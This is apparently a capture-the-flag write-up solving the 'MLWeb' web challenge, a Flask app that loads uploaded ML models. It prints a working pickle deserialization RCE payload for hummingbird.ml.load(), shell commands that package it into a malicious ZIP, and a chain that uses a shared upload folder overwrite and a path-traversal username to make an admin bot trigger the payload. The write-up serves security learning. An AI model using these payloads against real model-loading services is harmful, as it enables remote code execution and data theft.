MLWeb | Jorian Woltjer

This interesting challenge only had 13 solves at the end of the event, and I managed to get the first blood 🩸! The goal was very clear from the beginning but most of my time was spent in one small part until it finally clicked.

The Challenge

We got full source code and even a docker setup for this challenge, making it easy to test locally. When visiting the web page we can log in and register for an account to access the dashboard:

Dashboard of MLWeb after registering showing a few sidebar options

Some interesting functionality is present here, like uploading and managing files, changing your profile and reporting a profile to a bot.

On the /profile page we can view our username and register date, as well as another button labelled 'Visit My Profile'. After a few seconds of waiting we are brought to /profile/2 with a message saying "Bot successfully reported", so it is likely the bot just visited our profile. We can check this in the code:

# routes/routes_user.py
@bp_user.route('/profile/visit')
@login_required
def visit_profile():
    user_id = int(request.args.get('user_id', session['user_id']))
    visit_url(f"/profile/{user_id}")

    flash("Bot successfully reported", "success")
    return redirect(url_for('bp_user.view_profile', user_id=user_id))

# utils/bot.py
def visit_url(path):
    driver = webdriver.Firefox()

    driver.get(BASE_URL + "/login")
    sleep(0.5)

    username_field = driver.find_element(By.NAME, "username")
    username_field.send_keys("admin")
    password_field = driver.find_element(By.NAME, "password")
    password_field.send_keys(Config.ADMIN_PASSWORD)
    login_button = driver.find_element(By.ID, "loginBtn")
    login_button.click()
    
    sleep(0.5)
    driver.get(BASE_URL + path)

    sleep(3)
    driver.quit()

Every time we press this button the admin will log into their account and visit the profile we give it. Note that the user_id variable is parsed into an int meaning we cannot provide any arbitrary path here.

The view that is loaded for the admin looks like this:

{% include "./partials/head.html" %}
<body id="page-top">
    <div id="wrapper">
        {% include "./partials/sidebar.html" %}
        <div id="content-wrapper" class="d-flex flex-column">
            <div id="content">
                <div class="container-fluid">
                    <div class="container mt-5">
                        {% include "./partials/flash.html" %}
                        <div class="card">
                            <div class="card-body">
                                <h5 class="card-title">Profile #{{ user.id }}</h5>
                                <div class="form-group mt-5">
                                    <label>Username: <strong>{{ user.username }}</strong></label>
                                </div>
                                <div class="form-group">
                                    <label id="statusLabel">Status: Loading...</label>
                                </div>
                                <div class="form-group text-muted">
                                    <label>Register date: {{ user.register_date }}</label>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            {% include "./partials/bottombar.html" %}
        </div>
    </div>
    {% include "./partials/footer.html" %}
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            const statusLabel = document.getElementById("statusLabel");
            
            fetch('/profile/{{ user.username }}/is_logged')
                .then(response => response.json())
                .then(data => {
                    if (data.is_logged) {
                        statusLabel.innerHTML = "Status: <strong class='text-success'>Active</strong>";
                    } else {
                        statusLabel.innerHTML = "Status: <strong class='text-danger'>Inactive</strong>";
                    }
                }
            );
        });
    </script>
</body>
</html>

Interacting with the Bot

In the template above we find no Jinja2 |safe filters, meaning that HTML is always escaped to entities and we cannot simply get Cross-Site Scripting (XSS) with our username for example. There is another context however inside the <script> tag which is interesting. Because Jinja2 templates are not context-aware, they might miss escaping some characters like ' single quotes and allow you to escape from the fetch() string and start writing your own JavaScript.

Note: During the solving of this challenge I assumed that this would be an easy XSS vector without testing it, and went off to writing a whole JavaScript payload without once seeing if I actually could have XSS. As you'll read below, always test your theories!

If single quotes were not escaped, a payload like '-alert()-' would allow evaluating JavaScript that we provide, but unfortunately when we test it we find that it correctly does escape these:

from flask import Flask, render_template_string
app = Flask(__name__)
with app.app_context():
    print(render_template_string("{{ input }}", input="'-alert()-'"))

Output: '-alert()-'

Too bad, these are escaped. That means we cannot break out of the JavaScript context to get XSS. One thing we still might be able to abuse later is the fact that our unescaped input finds its way into a fetch() URL path, and using directory traversal we can point this request to any other page that might be useful. The response doesn't do anything here but maybe the authenticated GET request this sends can trigger something.

Insecure Deserialization by Design

Another page to look at is the Uploads section, where we can upload specifically .zip files which will be stored in a shared folder, and added to the database:

@bp_user.route('/upload', methods=['GET', 'POST'])
@login_required
def upload_model():
    if request.method == 'POST':
        if 'file' not in request.files:
            flash("Please select a file to upload", "danger")
            return redirect(url_for('bp_user.upload_model'))

        # Check extension to be `.zip`
        file = request.files['file']
        if file.filename == '' or not check_allowed_extensions(file.filename):
            flash("Please use a valid file and filename", "danger")
            return redirect(url_for('bp_user.upload_model'))

        # Save file to shared folder
        filename = secure_filename(file.filename)
        file_path = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)
        file.save(file_path)

        # Add path to database
        model = OptimizedModel(name=file.filename, file_path=file_path, user_id=session['user_id'])
        db.session.add(model)
        db.session.commit()
        flash("File successfully uploaded", "success")
        return redirect(url_for('bp_user.upload_model'))

    return render_template('upload.html')

These files can later be listed via /files. The files are uploaded to the path /app/uploads which is not in the exposed web root, which only /app/src/assets is. We can only edit or delete it after uploading and neither do anything particularly interesting.

When we look in the UI where it lists our files, however, we find another button called 'Load'. When click it an error message is displayed:

You need to be an admin to access this page.

Screenshot of file listing showing one upload with a 'Load' button

This triggers the /model/load/2 endpoint defined in the routes_admin.py file:

from hummingbird.ml import load

@bp_admin.route('/model/load/<int:model_id>', methods=['GET'])
@admin_required
def load_model(model_id):
    model = OptimizedModel.query.filter_by(id=model_id, user_id=session['user_id']).first()
    if not model:
        flash("Model not found", "danger")
        return redirect(url_for('bp_user.list_models'))

    try:
        load(model.file_path)
        flash("Model successfully loaded", "success")
    except Exception as e:
        flash("Error loading model: {}".format(e), "danger")

    return redirect(url_for('bp_user.list_models'))

This seems to load the uploaded ZIP file with hummingbird.ml.load(), but admin access is required as handled by the decorator:

def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash("You need to be logged in to access this page.", "danger")
            return redirect(url_for('bp_auth.login', next=request.url))
        if session['user_id'] != 1:
            flash("You need to be an admin to access this page.", "danger")
            return redirect(url_for('bp_user.home'))
        return f(*args, **kwargs)
    return decorated_function

We cannot make our user_id equal to 1, so we cannot access the endpoint. Still, let's explore this idea because maybe the admin can access it for us in the future. The function in question is load() from the hummingbird.ml library for Machine Learning models. Maybe there is any dangerous behaviour that we can exploit with an arbitrary ZIP file.

In Visual Studio Code, we can make a small testing example and set a breakpoint at the load() function to follow it and see what exactly happens.

from hummingbird.ml import load

load("test.zip")  # <-- Set a breakpoint by clicking the red dot on this line

Then, we can run the debugger on the Run and Debug tab on the left which will ask us to create a launch.json file. Here we choose the template for Python Debugger and Python File, which opens a JSON file where we can specify the options for debugging. It is important to note that by default, vscode does not follow library code and we have to tell it to do so because that's what we're interested in:

{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Python Debugger: Current File",
            "type": "debugpy",
            "request": "launch",
            "program": "${file}",
            "console": "integratedTerminal",
+           "justMyCode": false
        }
    ]
}

Finally, with our testing Python script open, we can press the green run button in the debugger to start it. This should eventually break at the load() function and allow us to step in, and follow the whole flow while reading local variables. This first hits a function like this:

def load(location, digest=None):
    ...

    # Unzip the dir.
    zip_location = location
    if not location.endswith("zip"):
        zip_location = location + ".zip"
    else:
        location = zip_location[:-4]
    assert os.path.exists(zip_location), "Zip file {} does not exist.".format(zip_location)

    # Verify the digest if provided.
    if digest is None:
        print("Warning: No digest provided. Model integrity not verified.")
    else:
        with open(zip_location, 'rb') as file:
            new_digest = hmac.new(b'shared-key', file.read(), hashlib.sha1).hexdigest()
            if digest != new_digest:
                raise RuntimeError('Integrity check failed')

    shutil.unpack_archive(zip_location, location, format="zip")

    assert os.path.exists(location), "Model location {} does not exist.".format(location)

    # Load the model type.
    with open(os.path.join(location, constants.SAVE_LOAD_MODEL_TYPE_PATH), "r") as file:
        model_type = file.readline()

    if "torch" in model_type:
        model = PyTorchSklearnContainer.load(location, do_unzip_and_model_type_check=False, digest=digest)
    elif "onnx" in model_type:
        model = ONNXSklearnContainer.load(location, do_unzip_and_model_type_check=False, digest=digest)
    elif "tvm" in model_type:
        model = TVMSklearnContainer.load(location, do_unzip_and_model_type_check=False, digest=digest)
    else:
        shutil.rmtree(location)
        raise RuntimeError("Model type {} not recognized.".format(model_type))

Using shutil.unpack_archive() our ZIP file is unpacked and written to a directory with the same name without .zip. Then, constants.SAVE_LOAD_MODEL_TYPE_PATH is read from this location are compared to various model types. Because we are running in the debugger we can simply step through to when this variable is defined and read its value at runtime: 'model_type.txt'.

If we include this file in our ZIP we can choose what model type to use. Let's see where any of those lead to, starting with torch:

class PyTorchSklearnContainer(SklearnContainer):
    ...
    def load(location, do_unzip_and_model_type_check=True, delete_unzip_location_folder: bool = True, digest=None):
        ...

        # Load the model type.
        with open(os.path.join(location, constants.SAVE_LOAD_MODEL_TYPE_PATH), "r") as file:
            model_type = file.readline()

        # Check the versions of the modules used when saving the model.
        if os.path.exists(os.path.join(location, constants.SAVE_LOAD_MODEL_CONFIGURATION_PATH)):
            with open(os.path.join(location, constants.SAVE_LOAD_MODEL_CONFIGURATION_PATH), "r") as file:
                configuration = file.readlines()
            check_dumped_versions(configuration, hummingbird, torch)
        else:
            warnings.warn(
                "Cannot find the configuration file with versions. You are likely trying to load a model saved with an old version of Hummingbird."
            )

        if model_type == "torch.jit":
            # This is a torch.jit model
            model = torch.jit.load(os.path.join(location, constants.SAVE_LOAD_TORCH_JIT_PATH))
            with open(os.path.join(location, "container.pkl"), "rb") as file:
                container = pickle.load(file)
            container._model = model
        elif model_type == "torch":
            # This is a pytorch  model
            with open(os.path.join(location, constants.SAVE_LOAD_TORCH_JIT_PATH), "rb") as file:
                container = pickle.load(file)
        else:
            if delete_unzip_location_folder:
                shutil.rmtree(location)
            raise RuntimeError("Model type {} not recognized".format(model_type))

It loads the model type from the same file again, and compares it to "torch.jit" or "torch", then Bingo! It loads our file with pickle.load(), an infamous serialization library that is vulnerable to insecure deserialization if untrusted data is loaded. Stepping through until this bit, we find that constants.SAVE_LOAD_TORCH_JIT_PATH is equal to 'deploy_model.zip'.

If we write a pickle Remote Code Execution payload in that location it should load and execute the code. Let's create a simple script that does this:

import pickle

class RCE:
    def __reduce__(self):
        import os
        return (os.system, ("id",))

rce = RCE()
data = pickle.dumps(rce)

with open("rce/deploy_model.zip", "wb") as f:
    f.write(data)

We will prepare this in a directory called rce/ and must include a file named 'model_type.txt' with exactly the content torch, not even a newline:

mkdir rce
echo -n 'torch' > rce/model_type.txt
(cd rce/ && zip -r - .) > rce.zip

If we now load rce.zip with our test script, we see the output of the 'id' command!

Warning: No digest provided. Model integrity not verified.
/home/user/.local/lib/python3.8/site-packages/hummingbird/ml/containers/sklearn/pytorch_containers.py:157: UserWarning: Cannot find the configuration file with versions. You are likely trying to load a model saved with an old version of Hummingbird.
  warnings.warn(
uid=1001(user) gid=1001(user) groups=1001(user)

We successfully crafted a ZIP file that when loaded, will run arbitrary commands on the server. Now we still need to figure out how exactly to trigger it.

Note: For some reason the highly unsafe pickle module is almost chosen as the standard in sharing Machine Learning models, so these kinds of load functions are often vulnerable to insecure deserialization with it.

Triggering the Admin

One idea is to upload our ZIP to the application, and then use the bot to view our profile and fetch the load URL with the vulnerability we found earlier. There is one problem with this though, the fact that the /model/load endpoint only allows loading a model owned by you:

@bp_admin.route('/model/load/<int:model_id>', methods=['GET'])
@admin_required
def load_model(model_id):
    # Notice the `user_id=` filter here
    model = OptimizedModel.query.filter_by(id=model_id, user_id=session['user_id']).first()
    if not model:
        flash("Model not found", "danger")
        return redirect(url_for('bp_user.list_models'))
    ...

This screws up our plan, because how would we get our model on the admin's account? With Cross-Site Scripting we could potentially make the admin upload a model and then tell it to load it. But we don't have an XSS vulnerability and it does seem like this is possible on any other page.
There aren't many other interesting pages we can fetch either, because uploading a file requires a POST request while the fetch() function does a GET request. We cannot get the admin to upload our malicious file to their account.

This took me a long time to find, but after logging in as the Administrator on my local docker instance I noticed there is one default file in the list of the admin as an example:

Administrator dashboard showing example_mode.zip in the list of files

This file can be loaded, and it seems like it will be the only file we can load. Now here comes the trick: All files are uploaded in the same shared folder, so why not overwrite example_mode.zip with our malicious payload, and then load it!

This way we upload it from our account which is possible, and then there is still a path for the admin pointing to the same location which we overwrote. We rename our local rce.zip to example_model.zip and make the payload more useful by extracting the flag instead of just running 'id':

import pickle

class RCE:
    def __reduce__(self):
        import os
        return (os.system, ("cp /app/flag* /app/assets/flag.txt",))

rce = RCE()
data = pickle.dumps(rce)

with open("rce/deploy_model.zip", "wb") as f:
    f.write(data)

After zipping this again and giving it the name example_mode.zip, we can upload it through the UI like normal. This says 'File successfully uploaded'.

Then, we need to force the admin user to load the example model stored at ID=1. This is easy with our fetch() vulnerability from earlier:

document.addEventListener("DOMContentLoaded", function () {
    const statusLabel = document.getElementById("statusLabel");
    
    fetch('/profile/{{ user.username }}/is_logged')
    ...

If a username is set to ../model/load/1?, the first /profile/ path is removed and the /is_logged part is ignored as a query string. We will register an account like this:

POST /register HTTP/1.1
Host: localhost:5000
Content-Length: 67
Content-Type: application/x-www-form-urlencoded

username=../model/load/1?&password=anything

Then the final step is to trigger the admin to visit this profile, by doing /profile/visit. After this responds with 'Bot successfully reported' we should find the flag extracted at /static/flag.txt!
GCC{0d4y_1n_d353r14l1z4710n_4r3_n07_7h47_h4rd_70_f1nd}